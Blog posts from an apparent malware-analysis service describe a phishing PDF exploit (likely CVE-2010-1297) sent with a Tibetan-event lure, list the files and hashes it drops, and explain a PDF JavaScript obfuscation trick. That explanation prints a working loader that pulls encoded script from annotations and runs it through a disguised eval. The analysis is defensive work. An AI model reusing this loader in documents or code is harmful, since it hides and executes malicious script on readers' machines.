Worst Social Engineering Ever

From a recent submission via the email intake - hereyougo at vicheck.ca:

With a subject line of a invitation to a Tibetan event, invitation.rar (3026984137716828cf8f55b10bb0069) contained the aptly named "exploit.pdf" which certainly inspires confidence to open the attachment:

exploit.pdf:
EXECUTABLE SCAN: PDF Exploit Embedded Flash may be CVE-2010-1297 (genexploit/full)
REPORT: https://www.vicheck.ca/md5query.php?hash=ee81327f15db183f83815754fbfad5dd
Exploit method detected as genexploit - PDF Exploit Embedded Flash may be CVE-2010-1297.
Confidence ranking: 100 (11 hits).

Embedded EXE is encrypted with a 256 byte key as well as a simple replacement cipher.

Drops:

c:\a.exe 23876a91a7510e5c39e39670f5b9343d	72560 bytes
c:\a.pdf 36710aef65cf5b4ccae81b2842821dbd	1243 bytes
C:\[WINDOWS]\system32\srvlic.dll e94e4e5023c51a7a37a02a3db5802944	20480 bytes
C:\[WINDOWS]\fxsst.dll da0ce7a6c134d45e63c61c301ba13c25	40960 bytes

PDF JavaScript Obfuscation

Here's a quick note on an emerging JavaScript obfuscation technique. The use of getAnnots and syncAnnotScan to iterate through FlateDecode blocks which contain raw encoded data. Inside the encoded data is usually packed obfuscated JavaScript with some recent exploit.

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));s = this['unes' + 'cape'] (l) ;var e = app['ev' + 'al']; e(s); s = ''; z = 1;

Our new blog

Welcome to the ViCheck blog, we're hoping to use this forum for updates on the malware analysis scene. Current trends are showing a rise in document format malware, viruses embedded in Adobe PDF or MS Office documents are difficult to detect. Our malware analysis engine at ViCheck.ca can detect current PDF exploits (media.newPlayer being the current favorite), as well as executables embedded in documents.

Yesterday's Google blog post has again highlighted the risks of PDF based malware against private corporations, government, and human rights groups. To reduce the risk from this type of malware, Javscript can be disabled in Acrobat Reader.

Recent ViCheck analysis reports of malware, including PDF viruses can be accessed from our website.